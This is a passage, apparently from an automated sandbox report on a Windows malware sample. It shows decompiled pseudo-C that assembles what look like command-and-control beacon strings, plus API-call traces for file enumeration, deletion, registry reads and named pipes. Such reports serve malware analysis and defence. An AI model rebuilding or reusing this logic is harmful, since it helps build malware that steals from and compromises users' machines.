                              • RtlExitUserThread.NTDLL(00000000), ref: 01047C5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CloseHandleTimerWaitable$ObjectSingle$MultipleObjects$MutexRelease_allmul$ErrorHeapLastThread$CreateFreeSwitchTimememcpy$AllocateCallEventExitFileNamedOpenPipeSystemTrimUserlstrlen
                              • String ID:
                              • API String ID: 2535136096-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E013E7132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                              				void* _v8;
                              				signed int _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				void* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				long _t59;
                              				intOrPtr _t60;
                              				intOrPtr _t61;
                              				intOrPtr _t62;
                              				intOrPtr _t63;
                              				intOrPtr _t64;
                              				void* _t67;
                              				intOrPtr _t68;
                              				int _t71;
                              				void* _t72;
                              				void* _t73;
                              				void* _t75;
                              				void* _t78;
                              				intOrPtr _t82;
                              				intOrPtr _t86;
                              				intOrPtr* _t88;
                              				void* _t94;
                              				intOrPtr _t100;
                              				signed int _t104;
                              				char** _t106;
                              				int _t109;
                              				intOrPtr* _t112;
                              				intOrPtr* _t114;
                              				intOrPtr* _t116;
                              				intOrPtr* _t118;
                              				intOrPtr _t121;
                              				intOrPtr _t126;
                              				int _t130;
                              				CHAR* _t132;
                              				intOrPtr _t133;
                              				void* _t134;
                              				void* _t143;
                              				int _t144;
                              				void* _t145;
                              				intOrPtr _t146;
                              				void* _t148;
                              				long _t152;
                              				intOrPtr* _t153;
                              				intOrPtr* _t154;
                              				intOrPtr* _t157;
                              				void* _t158;
                              				void* _t160;
                              
                              				_t143 = __edx;
                              				_t134 = __ecx;
                              				_t59 = __eax;
                              				_v12 = 8;
                              				if(__eax == 0) {
                              					_t59 = GetTickCount();
                              				}
                              				_t60 =  *0x13ed018; // 0x9945a377
                              				asm("bswap eax");
                              				_t61 =  *0x13ed014; // 0x3a87c8cd
                              				_t132 = _a16;
                              				asm("bswap eax");
                              				_t62 =  *0x13ed010; // 0xd8d2f808
                              				asm("bswap eax");
                              				_t63 =  *0x13ed00c; // 0x13d015ef
                              				asm("bswap eax");
                              				_t64 =  *0x13ed2b8; // 0x26ea5a8
                              				_t3 = _t64 + 0x13ee633; // 0x74666f73
                              				_t144 = wsprintfA(_t132, _t3, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0x13ed02c,  *0x13ed004, _t59);
                              				_t67 = E013E8DA6();
                              				_t68 =  *0x13ed2b8; // 0x26ea5a8
                              				_t4 = _t68 + 0x13ee673; // 0x74707526
                              				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                              				_t160 = _t158 + 0x38;
                              				_t145 = _t144 + _t71;
                              				_t72 = E013E40AC(_t134);
                              				_t133 = __imp__; // 0x74785520
                              				_v8 = _t72;
                              				if(_t72 != 0) {
                              					_t126 =  *0x13ed2b8; // 0x26ea5a8
                              					_t7 = _t126 + 0x13ee8b2; // 0x736e6426
                              					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                              					_t160 = _t160 + 0xc;
                              					_t145 = _t145 + _t130;
                              					HeapFree( *0x13ed270, 0, _v8);
                              				}
                              				_t73 = E013E8941();
                              				_v8 = _t73;
                              				if(_t73 != 0) {
                              					_t121 =  *0x13ed2b8; // 0x26ea5a8
                              					_t11 = _t121 + 0x13ee885; // 0x6f687726
                              					wsprintfA(_t145 + _a16, _t11, _t73);
                              					_t160 = _t160 + 0xc;
                              					HeapFree( *0x13ed270, 0, _v8);
                              				}
                              				_t146 =  *0x13ed35c; // 0x3ad95b0
                              				_t75 = E013E3FB8(0x13ed00a, _t146 + 4);
                              				_t152 = 0;
                              				_v20 = _t75;
                              				if(_t75 == 0) {
                              					L26:
                              					HeapFree( *0x13ed270, _t152, _a16);
                              					return _v12;
                              				} else {
                              					_t78 = RtlAllocateHeap( *0x13ed270, 0, 0x800);
                              					_v8 = _t78;
                              					if(_t78 == 0) {
                              						L25:
                              						HeapFree( *0x13ed270, _t152, _v20);
                              						goto L26;
                              					}
                              					E013E47EF(GetTickCount());
                              					_t82 =  *0x13ed35c; // 0x3ad95b0
                              					__imp__(_t82 + 0x40);
                              					asm("lock xadd [eax], ecx");
                              					_t86 =  *0x13ed35c; // 0x3ad95b0
                              					__imp__(_t86 + 0x40);
                              					_t88 =  *0x13ed35c; // 0x3ad95b0
                              					_t148 = E013EA7FB(1, _t143, _a16,  *_t88);
                              					_v28 = _t148;
                              					asm("lock xadd [eax], ecx");
                              					if(_t148 == 0) {
                              						L24:
                              						HeapFree( *0x13ed270, _t152, _v8);
                              						goto L25;
                              					}
                              					StrTrimA(_t148, 0x13ec2ac);
                              					_push(_t148);
                              					_t94 = E013E6F6D();
                              					_v16 = _t94;
                              					if(_t94 == 0) {
                              						L23:
                              						HeapFree( *0x13ed270, _t152, _t148);
                              						goto L24;
                              					}
                              					_t153 = __imp__;
                              					 *_t153(_t148, _a4);
                              					 *_t153(_v8, _v20);
                              					_t154 = __imp__;
                              					 *_t154(_v8, _v16);
                              					_t100 = E013E65F6( *_t154(_v8, _t148), _v8);
                              					_a4 = _t100;
                              					if(_t100 == 0) {
                              						_v12 = 8;
                              						L21:
                              						E013E55F1();
                              						L22:
                              						HeapFree( *0x13ed270, 0, _v16);
                              						_t152 = 0;
                              						goto L23;
                              					}
                              					_t104 = E013E7681(_t133, 0xffffffffffffffff, _t148,  &_v24);
                              					_v12 = _t104;
                              					if(_t104 == 0) {
                              						_t157 = _v24;
                              						_v12 = E013E42E6(_t157, _a4, _a8, _a12);
                              						_t112 =  *((intOrPtr*)(_t157 + 8));
                              						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                              						_t114 =  *((intOrPtr*)(_t157 + 8));
                              						 *((intOrPtr*)( *_t114 + 8))(_t114);
                              						_t116 =  *((intOrPtr*)(_t157 + 4));
                              						 *((intOrPtr*)( *_t116 + 8))(_t116);
                              						_t118 =  *_t157;
                              						 *((intOrPtr*)( *_t118 + 8))(_t118);
                              						E013E6DFA(_t157);
                              					}
                              					if(_v12 != 0x10d2) {
                              						L16:
                              						if(_v12 == 0) {
                              							_t106 = _a8;
                              							if(_t106 != 0) {
                              								_t149 =  *_t106;
                              								_t155 =  *_a12;
                              								wcstombs( *_t106,  *_t106,  *_a12);
                              								_t109 = E013E2F36(_t149, _t149, _t155 >> 1);
                              								_t148 = _v28;
                              								 *_a12 = _t109;
                              							}
                              						}
                              						goto L19;
                              					} else {
                              						if(_a8 != 0) {
                              							L19:
                              							E013E6DFA(_a4);
                              							if(_v12 == 0 || _v12 == 0x10d2) {
                              								goto L22;
                              							} else {
                              								goto L21;
                              							}
                              						}
                              						_v12 = _v12 & 0x00000000;
                              						goto L16;
                              					}
                              				}
                              			}

                              APIs
                              • GetTickCount.KERNEL32 ref: 013E7146
                              • wsprintfA.USER32 ref: 013E7196
                              • wsprintfA.USER32 ref: 013E71B3
                              • wsprintfA.USER32 ref: 013E71DF
                              • HeapFree.KERNEL32(00000000,?), ref: 013E71F1
                              • wsprintfA.USER32 ref: 013E7212
                              • HeapFree.KERNEL32(00000000,?), ref: 013E7222
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E7250
                              • GetTickCount.KERNEL32 ref: 013E7261
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E7275
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E7293
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013EA7FB: strcpy.NTDLL ref: 013EA845
                                • Part of subcall function 013EA7FB: lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013EA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                              • StrTrimA.SHLWAPI(00000000,013EC2AC,?,03AD95B0), ref: 013E72CA
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(?), ref: 013E6F85
                                • Part of subcall function 013E6F6D: lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                                • Part of subcall function 013E6F6D: lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E72EB
                              • lstrcpy.KERNEL32(?,?), ref: 013E72F3
                              • lstrcat.KERNEL32(?,?), ref: 013E7301
                              • lstrcat.KERNEL32(?,00000000), ref: 013E7307
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • wcstombs.NTDLL ref: 013E7398
                                • Part of subcall function 013E42E6: SysAllocString.OLEAUT32(?), ref: 013E4327
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • HeapFree.KERNEL32(00000000,?,?), ref: 013E73D9
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 013E73E5
                              • HeapFree.KERNEL32(00000000,?,?,03AD95B0), ref: 013E73F1
                              • HeapFree.KERNEL32(00000000,?), ref: 013E73FD
                              • HeapFree.KERNEL32(00000000,?), ref: 013E7409
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                              • String ID: Uxt
                              • API String ID: 3748877296-1536154274
                              • Opcode ID: df3bc572866a46ae788fea7f9ac6e8dfc9f7ec809732fd948940e626b236e95a
                              • Instruction ID: 84dafcf0cf4e246b1371ddadbd068927d68cf04fa2febace72054f1fc93500d3
                              • Opcode Fuzzy Hash: df3bc572866a46ae788fea7f9ac6e8dfc9f7ec809732fd948940e626b236e95a
                              • Instruction Fuzzy Hash: 90913871900319AFDB21DFA8DC48AAE7FF9EF08358F144065E908EB290D731D955DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,010501F4), ref: 010372CB
                              • RtlAllocateHeap.NTDLL(00000000,0104FAE1,?), ref: 01037367
                              • lstrcpyn.KERNEL32(00000000,?,0104FAE1,?,010501F4), ref: 0103737C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,010501F4), ref: 01037397
                              • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,0104FAE0,?,?,010501F4), ref: 0103747E
                              • StrChrA.SHLWAPI(00000001,00000020,?,010501F4), ref: 0103748F
                              • lstrlen.KERNEL32(00000000,?,010501F4), ref: 010374A3
                              • memmove.NTDLL(0104FAE1,?,00000001,?,010501F4), ref: 010374B3
                              • lstrlen.KERNEL32(?,?,00000000,00000000,?,0104FAE0,?,?,010501F4), ref: 010374DF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01037505
                              • memcpy.NTDLL(00000000,?,?,?,010501F4), ref: 01037519
                              • memcpy.NTDLL(0104FAE0,?,?,?,010501F4), ref: 01037539
                              • HeapFree.KERNEL32(00000000,0104FAE0,?,?,?,?,?,?,?,?,010501F4), ref: 01037575
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0103763B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 01037683
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                              • String ID: GET $GET $OPTI$OPTI$POST$PUT
                              • API String ID: 3227826163-647159250
                              • Opcode ID: 5984f442fdeaece335800be3391679e1e7da2b82331bfe2ff3719e0ecd4f62b7
                              • Instruction ID: 9136e0e49f42491c6f2b087b06e2b25fb2931be803e5a7f8dbe9642629dae5d9
                              • Opcode Fuzzy Hash: 5984f442fdeaece335800be3391679e1e7da2b82331bfe2ff3719e0ecd4f62b7
                              • Instruction Fuzzy Hash: 78E18BB5A00205EFDB64CFA8C884BAE7BB9FF44300F148498F995DB294DB71E951DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTickCount.KERNEL32 ref: 0103F0F7
                              • wsprintfA.USER32 ref: 0103F148
                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0103F153
                              • QueryPerformanceCounter.KERNEL32(?), ref: 0103F15D
                              • _aulldiv.NTDLL(?,?,?,?), ref: 0103F16F
                              • wsprintfA.USER32 ref: 0103F185
                              • wsprintfA.USER32 ref: 0103F1B1
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F1C3
                              • wsprintfA.USER32 ref: 0103F1E4
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F1F4
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0103F222
                              • GetTickCount.KERNEL32 ref: 0103F233
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103F247
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103F265
                                • Part of subcall function 01030B0F: lstrlen.KERNEL32(00000000,?,00000000,770CC740,74785520,?,?,0103F27A,?,04B3C0E0), ref: 01030B3A
                                • Part of subcall function 01030B0F: lstrlen.KERNEL32(?,?,?,0103F27A,?,04B3C0E0), ref: 01030B42
                                • Part of subcall function 01030B0F: strcpy.NTDLL ref: 01030B59
                                • Part of subcall function 01030B0F: lstrcat.KERNEL32(00000000,?), ref: 01030B64
                                • Part of subcall function 01030B0F: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0103F27A,?,?,0103F27A,?,04B3C0E0), ref: 01030B81
                              • StrTrimA.SHLWAPI(00000000,0104A3F8,?,04B3C0E0), ref: 0103F29C
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 01033EA2: lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                                • Part of subcall function 01033EA2: lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103F2B9
                              • lstrcpy.KERNEL32(?,?), ref: 0103F2C1
                              • lstrcat.KERNEL32(?,?), ref: 0103F2CF
                              • lstrcat.KERNEL32(?,00000000), ref: 0103F2D5
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0103F322
                                • Part of subcall function 0103E7D2: RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103E7DF
                                • Part of subcall function 0103E7D2: RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103E838
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0103F32E
                              • HeapFree.KERNEL32(00000000,?,?,04B3C0E0), ref: 0103F33A
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F346
                              • HeapFree.KERNEL32(00000000,?), ref: 0103F352
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrcatlstrlenwsprintf$lstrcpy$CountEnterLeavePerformanceQueryTickTrim$AllocateCounterFrequency_aulldivstrcpy
                              • String ID:
                              • API String ID: 3299512854-0
                              • Opcode ID: ef7afbfb135cac317a525c9c34da5a285ef2aca2e880926d0f2e7515b598aa5f
                              • Instruction ID: ce0875d6534719bd2963720c02a66969840af3905d6b3e1f57f7742531de3cfc
                              • Opcode Fuzzy Hash: ef7afbfb135cac317a525c9c34da5a285ef2aca2e880926d0f2e7515b598aa5f
                              • Instruction Fuzzy Hash: 47716C7594020AEFDB619FA8DD84EAF7BBAFF88314B154021F588D3128D73AD815CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32 ref: 01039D51
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039D6D
                              • GetLastError.KERNEL32 ref: 01039DBC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039DD2
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039DE6
                              • GetLastError.KERNEL32 ref: 01039E00
                              • GetLastError.KERNEL32 ref: 01039E33
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039E51
                              • lstrlenW.KERNEL32(00000000,?), ref: 01039E7D
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01039E92
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 01039F66
                              • HeapFree.KERNEL32(00000000,?), ref: 01039F75
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01039F8A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01039F9D
                              • HeapFree.KERNEL32(00000000,?), ref: 01039FAF
                              • RtlExitUserThread.NTDLL(?,?), ref: 01039FC4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: 23e762b00687f2e30f7bfa9b83e4be2cf0a61f57588b08766000281f2ec4dafb
                              • Instruction ID: 843ee0c19a85cda84d5fc4df4ee8e57b0f20f384447aed93ff7153b7dbf0e91b
                              • Opcode Fuzzy Hash: 23e762b00687f2e30f7bfa9b83e4be2cf0a61f57588b08766000281f2ec4dafb
                              • Instruction Fuzzy Hash: EC816BB590020AEFDB609FA8DDC8EAE7BBDFB48344F000069F68593114DB7A8905DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 01036781
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 010367A5
                              • HeapFree.KERNEL32(00000000,?,00000029,00000000,00000000,?), ref: 010367D0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010367FC
                              • HeapFree.KERNEL32(00000000,0104A3F8,0000002A,00000000,00000000,00000000), ref: 01036869
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 010368E1
                              • wsprintfA.USER32 ref: 010368FD
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0103691F
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01036A25
                              • wsprintfA.USER32 ref: 01036A3C
                              • lstrlen.KERNEL32(00000000,00000000), ref: 01036A47
                              • lstrlen.KERNEL32(00000000,00000000), ref: 01036908
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 010369AB
                              • wsprintfA.USER32 ref: 010369C6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 010369D1
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 010369E8
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 01036A0A
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 01036A5E
                              • HeapFree.KERNEL32(00000000,?), ref: 01036A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 334da8eca90e7d556dba3a17f8c4633091e86577cc6e4e42a0a1d8e248d3cadc
                              • Instruction ID: 73c1d69af3c79d4ab01da1e05507251a31536eec1c5f6f494c29c6849266cfa8
                              • Opcode Fuzzy Hash: 334da8eca90e7d556dba3a17f8c4633091e86577cc6e4e42a0a1d8e248d3cadc
                              • Instruction Fuzzy Hash: 0DB177B5900219FFEB619F98CD88AAEBBBDFB48344F104469F681A3214D7365E41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL ref: 010338EE
                              • wsprintfA.USER32 ref: 01033956
                              • wsprintfA.USER32 ref: 010339A2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010339B9
                              • wsprintfA.USER32 ref: 010339E2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010339F0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01033A0A
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01033A23
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 01033A41
                              • StrTrimA.SHLWAPI(00000000,0104A3F8,00000000,04B3C0E0), ref: 01033A77
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(04B3BFB8,00000000,00000000,74785520,0103F2A8,00000000), ref: 01033EB2
                                • Part of subcall function 01033EA2: lstrlen.KERNEL32(?), ref: 01033EBA
                                • Part of subcall function 01033EA2: lstrcpy.KERNEL32(00000000,04B3BFB8), ref: 01033ECE
                                • Part of subcall function 01033EA2: lstrcat.KERNEL32(00000000,?), ref: 01033ED9
                              • lstrcpy.KERNEL32(00000000,?), ref: 01033A96
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 01033A9D
                              • lstrcat.KERNEL32(00000000,?), ref: 01033AAA
                              • lstrcat.KERNEL32(00000000,?), ref: 01033AB1
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,?), ref: 01033B02
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01033B11
                              • HeapFree.KERNEL32(00000000,00000000,00000000,04B3C0E0), ref: 01033B1C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033B2A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033B35
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrcpywsprintf$AllocateCriticalSectionlstrlen$EnterLeaveTrim
                              • String ID:
                              • API String ID: 3219859236-0
                              • Opcode ID: 74f40fee2cb36fbb29f5fec0cbc86f24986512e485b72dd090f3d83c0fc96289
                              • Instruction ID: 84c5dceaebc1a99454b9731c3c08e2d4ba93009881598bc216c7dfebef3e4b2b
                              • Opcode Fuzzy Hash: 74f40fee2cb36fbb29f5fec0cbc86f24986512e485b72dd090f3d83c0fc96289
                              • Instruction Fuzzy Hash: 05718975640306EFD3A1AF18DD84F1B7BE9FB88310F050429F5C897269C77AA814CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0102F616
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                                • Part of subcall function 0103F63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                                • Part of subcall function 0103F63F: RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 0103F63F: RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F826
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 0102F672
                              • memcpy.NTDLL(00000000,?,00000000), ref: 0102F685
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0102F69C
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F8D2
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F8E4
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F8FF
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0102F6C7
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 0102F6DF
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102F739
                              • lstrlenW.KERNEL32(00000000,?), ref: 0102F75C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102F76E
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 0102F7E2
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F7F2
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0102F81B
                              • lstrlenW.KERNEL32(010517D4,?), ref: 0102F895
                              • DeleteFileW.KERNEL32(?,?), ref: 0102F8C3
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F8D1
                              • HeapFree.KERNEL32(00000000,?), ref: 0102F8F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
                              • Opcode ID: deb7cfab42ee2d0b9791a59e82c46c7e0e69441d7573636191b1c246315f25e6
                              • Instruction ID: ed2e5ac6b32b69df2a107d5665a0cde4f072e4c1d3784341f1d343a4b7725a6c
                              • Opcode Fuzzy Hash: deb7cfab42ee2d0b9791a59e82c46c7e0e69441d7573636191b1c246315f25e6
                              • Instruction Fuzzy Hash: BC913AB554022AAFDB60DFA4DCC8DEFBBBCFB08380B040466F685D7119E6759945CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0102D8FA
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0102D917
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0102D967
                              • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0102D971
                              • GetLastError.KERNEL32 ref: 0102D97B
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102D98C
